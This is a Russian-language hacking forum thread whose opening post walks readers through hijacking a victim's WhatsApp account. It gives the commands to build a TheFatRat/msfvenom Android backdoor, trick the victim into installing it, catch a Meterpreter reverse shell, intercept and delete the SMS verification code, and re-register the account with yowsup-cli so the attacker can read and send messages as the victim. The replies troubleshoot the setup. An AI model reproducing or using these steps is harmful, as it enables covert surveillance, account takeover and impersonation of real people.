![]() |
Добрый день,Уважаемые Форумчане и Друзья.
Сегодня мы разберём с вами один из интересных способов атаки на пользователей Whatsapp. В итоге,мы должны будем получить полный контроль над аккаунтом,просматривать сообщения,разговоры в текстовом формате. И,на мой взгляд,самое страшное-способность отсылать сообщения от имени скомпрометированного абонента на другие контакты. Для этого нам понадобиться знать 3 вещи: номер телефона,наличие у абонента Android и то,что он пользуется приложением Whatsapp. Нам также будут необходимы инструменты Metasploit,TheFatRat,RemoteWA,yowsup. Информация предназначена исключительно для ознакомления и изучения проблем безопасности. Категорически запрещено использование упоминаемых инструментов в незаконных целях. В случае неправомерных действий,администрация ресурса,авторы инструментов и обзора ответственности не несут.Соблюдайте разумность и этику. Итак,погнали.У нас имеются следующие исходные данные: а) Наш Ip-адрес роутера,он же шлюз (192.168.0.1 или 192.168.1.1) б) Наш публичный IP-адрес (внешний) В) MCC — код страны - это берём из википедии https://en.wikipedia.org/wiki/mobile_country_code г) MNC — код сети (Числовой код,соотв-щий оператору сотовой сети,берём также из Вики по справочнику) д) СС - телефонный код страны (а не то,что некоторые подумали)) В маршрутизаторе открываем для tcp-соединения порт 2020,которое будет перенаправляться на наши IP как внутренний, так и внешний. Теперь,надо создать исполняемый файл с расширением .apk,который будет здесь/TheFatRat/output/papados.apk (к примеру) Запускаем программу TheFatRat и выбираем 1 (создать Backdoor с msfvenom) Далее,указываем пункт 3 (Android fatrat.apk) IP-адрес тестируемого Amdroid, нам знать необязательно при этом. Грузим наш файл на ресурс,позволяющий загрузить файл для свободного доступа. Например,который приводит автор : http://ge.tt/ Это неважно,т.к. смысл в том,чтобы тестируемый абонент скачал и сохранил этот файл себе (придётся проявить способности СИ) На данном этапе,у нас появляется доступ к мобильному устройству. Стартуем Metasploit и закатываем use exploit / multi / handler И указываем нагрузку : set loadload android / meterpreter / reverse_tcp Указываем LHOST c LPORT 2020,даём команду exploit. В этом случае,мы получаем сессию Meterpreter (если тестируемый абонент скачал себе наш вредонос) Мы сейчас здесь не за этим конечно, и у нас уже установленa yowsup Это библиотека python, которая позволяет нам создавать приложение, использующее службу WhatsApp. Yowsup также используется для создания неофициального клиента WhatsApp По идее,пакет устанавливает RemotеWA,но на всякий случай. Уствновка: Код: Код:
# git clone https://github.com/tgalal/yowsup.gitКод: Код:
# git clone https://github.com/MundoHackers/RemoteWA.gitДа,если начнёте пробовать этот инструмент,то поймёте,как автор немного перестарался,в нём есть практически всё для этой атаки. Автоматизация всего описанного процесса,так сказать,присутствует. водим команду: Код: Код:
# yowsup-cli registration --requestcode sms --phone телефон --cc телеф.код страны --mnc код фирмы,предоставляющей услугиПомним,что у нас есть открытая сессия в meterpreter, и у есть возможность просмотреть полученные sms и удалить их. Таким образом,мы также говорим Whatsapp,что используем другое устройство (наш терминал конечно же) На этом этапе генерируется код регистрации: meterpreter> dump sms Создаём файл, из которого мы можем визуализировать содержимое: SMS messages dump Теперь,делаем такой запрос,запустив второй терминал,и нам Whatsapp высылает пароль: Код: Код:
# sudo yowsup-cli registration --register код полученный --phone телефон --cc телеф.код страныСоздадим файл с именем whatsapp_config.txt Так становятся доступны переговоры тестируемого абонента с третьими лицами При этом ,мы можем видеть не только слова,но и номера тех,кто говорит с тестируемым. Код: Код:
# sudo yowsup-cli demos --config whatsapp_config.txt --echoКод: Код:
# yowsup-master/sudo yowsup-cli demos --config whatsapp_config.txt --send номер телефона"сообщение"1) Файл должен попасть на Android тестируемого. 2) Тестируемый должен быть после в полном неведении (ведь ему будут приходить сообщения,которые надо будет убрать) Но ,тем не менее,метод имеет право на существование. Согласитесь,что если ещё и иметь физический доступ к устройству тестируемого...некрасивень о, однако , для него получается.) На этом ,у меня всё,подробности и ответы на вопросы можно посмотреть здесь (всё же,справедливо будет дать ссылку на автора метода) http://www.mundohackers.es/ Спасибо всем за внимание и до новых встреч. |
Цитата:
|
Цитата:
Связка мне понравилась,хотя много головной боли было с допиливаем (ну не без этого) Вариация devel позволяет всегда получать в первых рядах новую версию ядра. Скорость работы нормальная,но конечно из-за Гномовского окружения (всё же привык к нему)может быть и выше. Плюс ,объём установленных пакетов достаточно весомый.Справляется) |
Может кому понадобиться, Проверка номера HLR-запросом. Можно узнать (mcc: mnc: imsi:msc
https://smsc.ru/testhlr/ |
Отстой
Необоснованная оценка. 72 часа на обдумывание. Администратор. |
Цитата:
[doublepost=1503615272,1503614046][/doublepost] Цитата:
Если читать колонку автора метода,то он не просто шутит о том,что такие атаки проводят в тёмное время суток. Суть в том ,что вредонос должен попасть на тестируемое устройство,владелец которого скачивает его по ссылке. Сложность именно в этом временном интервале,когда злоумышленник дожидается ночи. Ведь обратная сессия не прилетает без причины и катализатора. Вот в это время и происходит всё. Т.е.,расчёт на то,что при скачивании у владельца устройства не должно возникнуть подозрений,что в прилагаемом файле содержится что-то ещё.Устройство не защищено ( Сам редко вижу Андроиды с установленными AV). |
Цитата:
Проверяем открытый порт (делаем проброс при необходимости).Никаких ip тестируемого человека нам не требуется.Всё есть в описании,не поленитесь посетить колонку автора,скрины подробнее,чем само описание. |
Цитата:
|
Цитата:
192.168.0.1 <- роутер <----192.168.0.10 комп с пэррот или кали 192.168.0.11 жертва. Мы создаем файл, который должен нам дать доступ к 192.168.0.11 , работаем мы с 192.168.0.10, значит мы на 10 поднимаем то, что будет принимать нам связь при запуске нашего приложения на 11 машине. Одним словом, на той системе, на которой настраивается ожидание соеденение (в метасплоит к примеру) мы и пишем этот IP в LHOST |
Цитата:
А еще у меня не грузится история после регистрации в yowsup-cli, хотя сообщения отправляются без ошибок. Может это как раз из-за того, что с телефона WhatsApp слетел? кто сталкивался? |
| Время: 22:52 |